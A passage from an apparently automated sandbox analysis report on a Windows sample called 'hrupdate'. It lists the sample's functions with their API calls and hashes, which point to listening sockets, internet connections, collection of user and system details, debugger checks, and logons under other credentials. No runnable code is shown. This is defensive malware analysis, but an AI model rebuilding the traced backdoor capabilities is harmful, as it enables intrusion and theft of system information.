                                                                  • Part of subcall function 04FCCC39: recvfrom.WS2_32(?,B0C25DAC,000FFFFC,00000000,?,?), ref: 04FCCCB8
                                                                  • Part of subcall function 04FCCC39: WSAGetLastError.WS2_32 ref: 04FCCCC3
                                                                • GetTickCount.KERNEL32 ref: 04FCCDAA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTickhtonl$ErrorLast_mallocacceptioctlsocketrecvfromselect
                                                                • String ID:
                                                                • API String ID: 597769433-0
                                                                • Opcode ID: d284ca3aba63543a61d0a22bb563b200ecea94e0c53fa03e175d8a1301e860ed
                                                                • Instruction ID: d9418c59e8d48752ca377ff6ee06c2bf552969cf93b0e3a9be1a34d57bdcfc76
                                                                • Opcode Fuzzy Hash: d284ca3aba63543a61d0a22bb563b200ecea94e0c53fa03e175d8a1301e860ed
                                                                • Instruction Fuzzy Hash: A3D0A992A210AB0AF2013BA4AE008AE2A9A8EC8574739003FE088C3100DD08B80312B2
                                                                Function 04FD5ECA Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _calloc.LIBCMT ref: 04FD5F2C
                                                                  • Part of subcall function 04FEBB50: __calloc_impl.LIBCMT ref: 04FEBB65
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __calloc_impl_calloc
                                                                • String ID:
                                                                • API String ID: 2108883976-0
                                                                • Opcode ID: 7c819f985e74352b6811e14d1ccb276b403782c48ad41fe43161d66dd956603c
                                                                • Instruction ID: 1eeca16ef275ccda8f6d265980873dd744f2322eafc59c01ebed7e4eb6f26e73
                                                                • Opcode Fuzzy Hash: 7c819f985e74352b6811e14d1ccb276b403782c48ad41fe43161d66dd956603c
                                                                • Instruction Fuzzy Hash: 7EA118B1D00208EFEF219F95CC45EAEBBB6FF89700F14415AF501AA250E7726A91DF61
                                                                Function 030DC365 Relevance: 1.6, APIs: 1, Instructions: 136libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,030DBCAB,AAAABBBB,?,?,?,?), ref: 030DC3D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 52b2a5cd8be6c39a7177695a6cfaf2b078eabeb2ff83b80fc3f6fd0b178b378e
                                                                • Instruction ID: 2d75b5046121f6625f77991bc7764e22c104bb59cdd9b5514423343e2953c600
                                                                • Opcode Fuzzy Hash: 52b2a5cd8be6c39a7177695a6cfaf2b078eabeb2ff83b80fc3f6fd0b178b378e
                                                                • Instruction Fuzzy Hash: 9751D975A0120ADFDF04CF98C490AAEB7B2FF88314F1481A9D915AB355D734AE51CF94
                                                                Function 04FC47F4 Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetConnectA.WININET(0BC9BF25,?,?,00000000,00000000,00000003,00000000,05009668), ref: 04FC48B5
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC9048
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC909F
                                                                  • Part of subcall function 04FC8F1A: _malloc.LIBCMT ref: 04FC8F5B
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8F6C
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8FB7
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC900C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc_memset$ConnectInternet
                                                                • String ID:
                                                                • API String ID: 3195992531-0
                                                                • Opcode ID: 0236395654fbfbadd36c939b480672110834c17f6d3580d5bc5b2c3ddfe2ca0a
                                                                • Instruction ID: a286d6f29b9b2716c635db30adf3fac5543e923d4c2f0cdd63f5ee4173b29516
                                                                • Opcode Fuzzy Hash: 0236395654fbfbadd36c939b480672110834c17f6d3580d5bc5b2c3ddfe2ca0a
                                                                • Instruction Fuzzy Hash: 971186E2A422257AF7603EB66D8AEDB3E0CDF267E4F001428BA0D55182E4B9D515C3F1
                                                                Function 04FCE638 Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapDestroy.KERNEL32(?), ref: 04FCE6B2
                                                                  • Part of subcall function 04FD05AD: _memset.LIBCMT ref: 04FD05CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: DestroyHeap_memset
                                                                • String ID:
                                                                • API String ID: 3970643317-0
                                                                • Opcode ID: 49f5b80df8d1e320068d8619e477928eddce1bac17786b5980fe4157d42e568d
                                                                • Instruction ID: 9bbcb0687a9fbfd06cf4f27ae27cd0bebe23242d4a3bd94a9dd90a1f8ad338e1
                                                                • Opcode Fuzzy Hash: 49f5b80df8d1e320068d8619e477928eddce1bac17786b5980fe4157d42e568d
                                                                • Instruction Fuzzy Hash: 4D11063293421A9FE730AE24DE48FBA7359EF11224F08092DFC5495190FA31F943E695
                                                                Function 04FC4770 Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,?,04FC3826,00000000,00000000), ref: 04FC47EB
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC9048
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC909F
                                                                  • Part of subcall function 04FC8F1A: _malloc.LIBCMT ref: 04FC8F5B
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8F6C
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8FB7
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC900C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc_memset$InternetOpen
                                                                • String ID:
                                                                • API String ID: 4223322473-0
                                                                • Opcode ID: daad5e03c772b7b3edb3291a81e634cc0d1b6979eda8028528d5d49bd1705009
                                                                • Instruction ID: ff9f6b0de012941de3553773af77058454f8a6c2232b494cccc48f79b3f784a1
                                                                • Opcode Fuzzy Hash: daad5e03c772b7b3edb3291a81e634cc0d1b6979eda8028528d5d49bd1705009
                                                                • Instruction Fuzzy Hash: 9C01A2A25421667BEB603EB66D88CEB3E1CDF132F4B000028B90D50151E97AD922C2F0
                                                                Function 04FD90E8 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FD90EF
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_malloc
                                                                • String ID:
                                                                • API String ID: 501242067-0
                                                                • Opcode ID: 8b268d33f4da052775c4fac2334838a24dc25074d59de26fffd9e3ff5bde0c3a
                                                                • Instruction ID: c775b16a8697387b7865ae47420d7045bf0f8e2e668a596293d4bc1759736667
                                                                • Opcode Fuzzy Hash: 8b268d33f4da052775c4fac2334838a24dc25074d59de26fffd9e3ff5bde0c3a
                                                                • Instruction Fuzzy Hash: D4E01A722086014FE7288E68F844A06B7E29B85620B24CA3ED09AC7284D634A0824A04
                                                                Function 030D0B00 Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943261840.00000000030D0000.00000020.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_30d0000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 3ab698677288094206fdaddb6a5ff155a75b1911f092ad22742264aa959053c2
                                                                • Instruction ID: df29297d8e3491a32d28598d6daaba1676f7461774cf185ee19f9d2843758eb7
                                                                • Opcode Fuzzy Hash: 3ab698677288094206fdaddb6a5ff155a75b1911f092ad22742264aa959053c2
                                                                • Instruction Fuzzy Hash: 6EF030B5906308EBDB04DF54E444A9AB7E9AB4125CF08C164E80D4F642D735EAC4CBC1
                                                                Function 04FC8AAE Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(433D8FB7,00000000,04FC398F), ref: 04FC8ACF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 0bd0395a52e0cee161c8cdb2bb47fcbfcc456d4c101e89e47491ac4a4c1c5ce6
                                                                • Instruction ID: 4773f32c2a5f1964e1bc17737b9cf4538e725b329a344b42d819582bead74734
                                                                • Opcode Fuzzy Hash: 0bd0395a52e0cee161c8cdb2bb47fcbfcc456d4c101e89e47491ac4a4c1c5ce6
                                                                • Instruction Fuzzy Hash: B2D0C99550061379EA587B64AE24B8A32489F056B7B24045EF00AD5480DF25E0428162

                                                                Non-executed Functions

                                                                Function 04FC8839 Relevance: 15.2, APIs: 10, Instructions: 172filetimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FC884B
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _memset.LIBCMT ref: 04FC8857
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                  • Part of subcall function 04FC490F: htonl.WS2_32(00000000), ref: 04FC4915
                                                                • _strncmp.LIBCMT ref: 04FC88A6
                                                                • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 04FC88B4
                                                                  • Part of subcall function 04FDD93E: __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FDD93E: ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                  • Part of subcall function 04FDD93E: ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                  • Part of subcall function 04FDD93E: HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                  • Part of subcall function 04FDD93E: GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 04FC88E5
                                                                • GetLastError.KERNEL32 ref: 04FC88F2
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 04FC893E
                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 04FC894E
                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 04FC89E1
                                                                • FindClose.KERNEL32(00000000), ref: 04FC89F0
                                                                  • Part of subcall function 04FC4A19: _vwprintf.LIBCMT ref: 04FC4A23
                                                                  • Part of subcall function 04FC4A19: _vswprintf_s.LIBCMT ref: 04FC4A47
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
                                                                • String ID:
                                                                • API String ID: 2804257087-0
                                                                • Opcode ID: cd8e6ae8cb85695fa7a88b7d3775127947ce7bbfef0c0dc1ba940a595af1e351
                                                                • Instruction ID: 59d94f4d768991f90ec74cd129cbde6a7d512561654dc57c7afc82428393abfa
                                                                • Opcode Fuzzy Hash: cd8e6ae8cb85695fa7a88b7d3775127947ce7bbfef0c0dc1ba940a595af1e351
                                                                • Instruction Fuzzy Hash: 8D5152B2D0012EBBEB10EBE1DD45EFF77BCAF08605F04041AF605E2181FA78A6468765
                                                                Function 04FCE544 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FCE551
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • __snprintf.LIBCMT ref: 04FCE562
                                                                • FindFirstFileA.KERNEL32(00000000,04FC86DC,?,04FCE633,04FC86DC,?,Function_0000565A), ref: 04FCE56F
                                                                  • Part of subcall function 04FDD93E: __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FDD93E: ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                  • Part of subcall function 04FDD93E: ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                  • Part of subcall function 04FDD93E: HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                  • Part of subcall function 04FDD93E: GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                • _malloc.LIBCMT ref: 04FCE5AE
                                                                • __snprintf.LIBCMT ref: 04FCE5C3
                                                                  • Part of subcall function 04FCE507: _malloc.LIBCMT ref: 04FCE512
                                                                  • Part of subcall function 04FCE507: __snprintf.LIBCMT ref: 04FCE526
                                                                • FindNextFileA.KERNEL32(000000FF,04FC86DC,?,?,?,?,?,?,?), ref: 04FCE5F0
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 04FCE5FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                                                                • String ID:
                                                                • API String ID: 1254174322-0
                                                                • Opcode ID: 098f97666481b673adfaba5076dea8946913ca4ea0e53f02f221d4b84ebce218
                                                                • Instruction ID: f7cbdc40f96fd6e4de57315b4d12de9320ab9d9d11eaacf7aaf9a5e9c3e2b5a5
                                                                • Opcode Fuzzy Hash: 098f97666481b673adfaba5076dea8946913ca4ea0e53f02f221d4b84ebce218
                                                                • Instruction Fuzzy Hash: 3521A172900208BBEB116F61CD49FAA3B6DEF41264F088418F904A6161EB31AD129B60
                                                                Function 04FCBCA3 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 04FCBD08
                                                                • GetComputerNameA.KERNEL32(?,?), ref: 04FCBD18
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 04FCBD2C
                                                                • _strrchr.LIBCMT ref: 04FCBD3B
                                                                • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04FCBD56
                                                                • __snprintf.LIBCMT ref: 04FCBDCB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                                                                • String ID:
                                                                • API String ID: 1877169212-0
                                                                • Opcode ID: e81f2fa99571fb02cc575045e4322b2ef0a5479a07b84fa71fbb5204e903a7ff
                                                                • Instruction ID: 25a8fd0afd80ffe93f4dd93665927dba6eed9c42c148a97017ba8f77ac01576e
                                                                • Opcode Fuzzy Hash: e81f2fa99571fb02cc575045e4322b2ef0a5479a07b84fa71fbb5204e903a7ff
                                                                • Instruction Fuzzy Hash: 4C419475C0021ABFEF01AFA1ED49DAE7FB9EF44314F10445DE904AA291DB75BA02DB60
                                                                Function 04FCA1AE Relevance: 9.1, APIs: 6, Instructions: 118threadsleepprocessCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(04FF669C,04FF6688,04FC9F20,00000000), ref: 04FCA1F3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 04FCA1FA
                                                                  • Part of subcall function 04FCA122: _malloc.LIBCMT ref: 04FCA141
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04FCA229
                                                                • Thread32First.KERNEL32(00000000,0000001C), ref: 04FCA23E
                                                                • Thread32Next.KERNEL32(00000000,0000001C), ref: 04FCA286
                                                                • Sleep.KERNEL32(000000C8,00000004,00000000), ref: 04FCA29D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Thread32$AddressCreateFirstHandleModuleNextProcSleepSnapshotToolhelp32_malloc
                                                                • String ID:
                                                                • API String ID: 147937454-0
                                                                • Opcode ID: cbcd524baa10e243f19bf4decd4078974110c91559862b2cddd3ab5c345251bc
                                                                • Instruction ID: 0611301ed696e2a58762521c9654031e3668017107dc49dd8ec0477f6612b7f1
                                                                • Opcode Fuzzy Hash: cbcd524baa10e243f19bf4decd4078974110c91559862b2cddd3ab5c345251bc
                                                                • Instruction Fuzzy Hash: C2412E72E0020DBFEF10DFA4DD45AEE7BB9EF04305F144429E605D6150E672BA86CB61
                                                                Function 04FCC481 Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • htonl.WS2_32 ref: 04FCC49E
                                                                • htons.WS2_32(?), ref: 04FCC4AE
                                                                • socket.WS2_32(00000002,00000002,00000000), ref: 04FCC4C4
                                                                • closesocket.WS2_32(00000000), ref: 04FCC4D1
                                                                • bind.WS2_32(00000000,?,00000010), ref: 04FCC4FF
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 04FCC516
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                                                • String ID:
                                                                • API String ID: 3910169428-0
                                                                • Opcode ID: a440109cb3f3cbaf2b046ec6c411158862174b29a3dff282e31dee401a814ae6
                                                                • Instruction ID: 1ad1bde2b9a88f0670ce9253d49fd43d7704d187f3f614db3d90bc0f123ca187
                                                                • Opcode Fuzzy Hash: a440109cb3f3cbaf2b046ec6c411158862174b29a3dff282e31dee401a814ae6
                                                                • Instruction Fuzzy Hash: 8911C472E00219ABE710ABF99D45FBFB7ECDF08329F10852AF614E71C0E67469068765
                                                                Function 04FC6BE7 Relevance: 9.1, APIs: 6, Instructions: 68sleepnetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FC6BF9
                                                                • Sleep.KERNEL32(000003E8), ref: 04FC6C69
                                                                • GetTickCount.KERNEL32 ref: 04FC6C6F
                                                                • Sleep.KERNEL32(000003E8), ref: 04FC6C82
                                                                • closesocket.WS2_32(00000000), ref: 04FC6C89
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 04FC6C9C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountSleepTick$closesocketsend
                                                                • String ID:
                                                                • API String ID: 1472970430-0
                                                                • Opcode ID: 783b8b804b041c50e23ca35953fc47abd18cb6c04bb3c07269d38fd0b00f78ee
                                                                • Instruction ID: 90b89be89733316f77b246d1f2c8d72c52f6a8089e4d38cca1481c8e8c4eb915
                                                                • Opcode Fuzzy Hash: 783b8b804b041c50e23ca35953fc47abd18cb6c04bb3c07269d38fd0b00f78ee
                                                                • Instruction Fuzzy Hash: 02119372D04219AFFF01AFF5ED818DE7B78EF04324F14052AE225A2190EA75B6429B61
                                                                Function 04FCC39F Relevance: 9.1, APIs: 6, Instructions: 54networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FCC3B7
                                                                • htons.WS2_32(?), ref: 04FCC3D3
                                                                • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 04FCC3EC
                                                                • closesocket.WS2_32(00000000), ref: 04FCC3F7
                                                                • bind.WS2_32(00000000,?,00000010), ref: 04FCC405
                                                                • listen.WS2_32(00000000,?), ref: 04FCC413
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: bindclosesockethtonsioctlsocketlistensocket
                                                                • String ID:
                                                                • API String ID: 1767165869-0
                                                                • Opcode ID: aab24a4c07277b1ecba86a7f197446d2f929a21d4ef8059e42f56aa311a53510
                                                                • Instruction ID: c598c21b3d16af02b63c704df1ddd7c7c13157ada06f611c9aa6629a77631f3b
                                                                • Opcode Fuzzy Hash: aab24a4c07277b1ecba86a7f197446d2f929a21d4ef8059e42f56aa311a53510
                                                                • Instruction Fuzzy Hash: B5012832A0066A7BDB216FA49D04AFFBB7DDF00710F20010AFA04F2185E730A94383E5
                                                                Function 04FE555E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 04FE936D
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04FE9382
                                                                • UnhandledExceptionFilter.KERNEL32(04FF0C54), ref: 04FE938D
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 04FE93A9
                                                                • TerminateProcess.KERNEL32(00000000), ref: 04FE93B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                • Opcode ID: 2d1bb1e4c2037620ac8cdd82deec0820a59f7e38624e6ee541a0917129dcf7d5
                                                                • Instruction ID: 3daea983244254d8b54fe394ecdea3198c75b6ec268080920ee4f4646c4234a2
                                                                • Opcode Fuzzy Hash: 2d1bb1e4c2037620ac8cdd82deec0820a59f7e38624e6ee541a0917129dcf7d5
                                                                • Instruction Fuzzy Hash: 2821A3B58212299FDB00DF65FC8AA583FF4FB09315F50201AF40987651EFB85982DF55
                                                                Function 04FD3FA4 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FD3FB6
                                                                • closesocket.WS2_32(00000000), ref: 04FD3FC3
                                                                • htons.WS2_32(?), ref: 04FD3FD4
                                                                • bind.WS2_32(00000000,?,00000010), ref: 04FD3FEB
                                                                • listen.WS2_32(00000000,00000078), ref: 04FD3FFC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: bindclosesockethtonslistensocket
                                                                • String ID:
                                                                • API String ID: 564772725-0
                                                                • Opcode ID: 7255d02c687d914d9450ce2645396f8a6badeebf803350f266f51b2a60a793d4
                                                                • Instruction ID: 8df8894221d15653e6474c186257969db43f75eb6256ab7c74b734d4645fbdde
                                                                • Opcode Fuzzy Hash: 7255d02c687d914d9450ce2645396f8a6badeebf803350f266f51b2a60a793d4
                                                                • Instruction Fuzzy Hash: 71F0D132D4422976EA143BB46C0AFBE732A9F00328F444700FE31A50D1DAB4B50656A6
                                                                Function 04FC7D88 Relevance: 6.1, APIs: 4, Instructions: 98processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,04FC7FB9,C2E8296A,83FFFFD9,74DEE010,04FC80F0), ref: 04FC7DBA
                                                                • GetLastError.KERNEL32 ref: 04FC7DCC
                                                                • _memset.LIBCMT ref: 04FC7E15
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorLastLogonProcessWith_memset
                                                                • String ID:
                                                                • API String ID: 2584212486-0
                                                                • Opcode ID: 7226779943ed806f5c8e5e4cf4d5cc54b6c4d004df14bdbacd6dc6eda376a00c
                                                                • Instruction ID: cd1c698f172810cee14641d577e3998b8d38460b5c26c5254bf81c954b717e36
                                                                • Opcode Fuzzy Hash: 7226779943ed806f5c8e5e4cf4d5cc54b6c4d004df14bdbacd6dc6eda376a00c
                                                                • Instruction Fuzzy Hash: B1310577900216EFDB22AF64AC05BA67BADEF49700F184098F945D7111EA75F906CB90
                                                                Function 04FD33CB Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FD3070: RevertToSelf.ADVAPI32(00000100,04FD3609,00000000,?,?,04FC4B6E,?,00000000,00000000,00000000,00000100,00000100), ref: 04FD3088
                                                                • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,05009F5C), ref: 04FD33EB
